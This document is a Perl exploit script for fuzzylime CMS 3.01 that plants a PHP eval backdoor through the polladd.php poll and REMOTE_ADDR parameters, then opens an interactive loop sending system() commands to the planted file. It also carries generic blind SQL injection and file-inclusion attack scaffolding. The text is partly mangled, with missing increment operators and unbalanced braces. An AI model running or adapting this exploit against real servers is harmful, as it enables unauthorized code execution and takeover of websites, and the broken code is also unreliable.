fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

#!/usr/bin/perl

#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!

#after i noticed that there was a problem changing $cmd,i fixed it.this is the result.

## Fuzzylime 3.01 Remote Code Execution

## Credits: real and inphex

## [C:]# perl ye.pl host /path/

## :>id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

use LWP::UserAgent;

use HTTP::Cookies;

use Switch;

$host_ = "http://".shift;

$path_ = shift;

$info{'info'} = {

"description" => ["#################################################nFuzzyLime Remote Code Executionn#################################################nreal & inphexn"],

"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 2,

"cookie" =>

{

"cookie" => [""],

"sending_options" =>

{

"host" => $host_,

"path" => $path_."code/polladd.php",

"port" => 80,

"method_a" => "REMOTE_CODE_EXECUTION",

"attack" =>

{

"poll" => ["get","poll","....//swear"],

"log" => ["get","log","1"],

"_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","";eval("$_POST[cmd]"); ?>"],

};

&start($info{'info'},222);

while () {

print ":>";

$cmd = <STDIN>;

chomp($cmd);

$info1{'info1'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php", "port" => 80, "method_a" => "REMOTE_CODE_EXECUTION", "attack" =>{

"cmd" => ["post","cmd","system('".$cmd."');"],},},};

&start($info1{'info1'},221);

print ${$info1{'info1'}}{221}{'content'};

}

sub start

{

$a_ = shift;

$id = shift;

$post_dA = "";

$get_dA = get_d_p_s("get");

$post_dA = get_d_p_s("post");

my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);

$jj = 1;

$ii = 48;

$hh = 1;

$ppp = 0;

$s = shift;

$a = "";

$res_p = "";

$h = "";

$ua= "";

$agent= "";

$k= "";

$v= "";

$get_data= "";

$post_data= "";

$header_dA = "";

$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};

$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};

$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};

$method_m = $a_->{'sending_options'}{'method_a'};

$ua = LWP::UserAgent->new;

$ua->timeout($a_->{'options'}{'timeout'});

if ($a_->{'options'}{'proxy'}) {

$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});

}

$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";

$ua->agent($agent);

{

while (($k,$v) = each(%{$a_}))

{

if ($k ne "options" && $k ne "sending_options")

{

foreach $r (@{$a_->{$k}})

{

print $a_->{$k}[0];

}

foreach $j (@{$a_->{'options'}{'default_headers'}})

{

$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);

$m ;

}

if ($a_->{'options'}{'cookie'}{'cookie'}[0])

{

$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);

}

switch ($method_m)

{

case "attack" { &attack();}

case "SQL_INJECTION_BLIND" { &sql_injection_blind();}

case "REMOTE_COMMAND_EXECUTION" { &attack();}

case "REMOTE_CODE_EXECUTION" {&attack();}

case "REMOTE_FILE_INCLUSION" { &attack();}

case "LOCAL_FILE_INCLUSION" { &attack(); }

else { &attack(); }

}

sub attack

{

my ($jj);

my ($h);

my($x);

if ($post_dA eq "") {

$method = "get";

} elsif ($post_dA ne "")

{

$method = "post";

}

if ($method eq "get") {

$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

} elsif ($method eq "post")

{

$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

sub sql_injection_blind

{

while ()

{

while ($ii <= 120)

{

$itsx = "[".chr($ii)."]";

$l = length($itsx);

$b = ("b")x$l;

syswrite STDOUT,$b.$itsx;

if(check($ii,$hh) == 1)

{

syswrite STDOUT,$b.chr($ii)."---";

$hh ;

$chr = $chr.chr($ii);

}

$ii ;

}

push(@ffs,length($chr));

if (($#ffs - 999) == $ffs)

{

exit;

}

$ii = 48;

}

sub check($$)

{

my ($h);

my ($a);

$ii = shift;

$hh = shift;

if (get_d_p_s("post") ne "")

{

$method = "post";

} else { $method = "get";}

if ($method eq "get")

{

$ppp ;

$query = modify($get_dA,$ii,$hh);

$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 1;

} else { return 0;}

}

else

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 0;

}else { return 1;}

}

$h ;

}

} elsif ($method eq "post")

{

$ppp ;

$query_g = modify($get_dA,$ii,$hh);

$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

return 1;

}

else

{

return 0;

}

$h ;

}

sub modify($$$)

{

$string = shift;

$replace_by = shift;

$replace_by1 = shift;

if ($string !~/$i/ && $string !~/$h/) {

return $string;

} elsif ($string !~/$i/)

{

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

} elsif ($string !~/$h/)

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

return $string;

} else

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

}

sub get_d_p_s

{

$k = 0;

$v = 0;

$g_d_p_s = shift;

@post = ();

@get = ();

$post_data = "";

$get_data = "";

$header_data = "";

%header_dA = ();

$p = "";

$g = "";

while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))

{

if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)

{

$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {

$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")

{

$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];

}

if ($g_d_p_s eq "get")

{

return $g;

}

elsif ($g_d_p_s eq "post")

{

return $p;

} elsif ($g_d_p_s eq "header")

{

return %header_dA;

}

@a_ = ();

}

sub get_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

return $req->content;

}

sub post_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

$content_type = shift;

$send = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

$req->content_type($content_type);

$req->content($send);

$res = $ua->request($req);

return $res->content;

}